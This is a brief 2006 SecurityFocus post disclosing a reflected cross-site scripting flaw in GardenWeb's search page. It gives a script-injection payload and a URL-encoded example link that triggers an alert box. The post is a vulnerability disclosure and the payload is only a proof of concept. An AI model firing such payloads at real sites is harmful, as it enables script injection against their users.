SecurityFocus

XSS in GardenWeb Jun 12 2006 08:46PM
nanoymaster gmail com

use the searchbox with

"><script>alert('XSS')</script>

eg url:

http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Eal
ert%28%27XSS%27%29%3C%2Fscript%3E

[ reply ]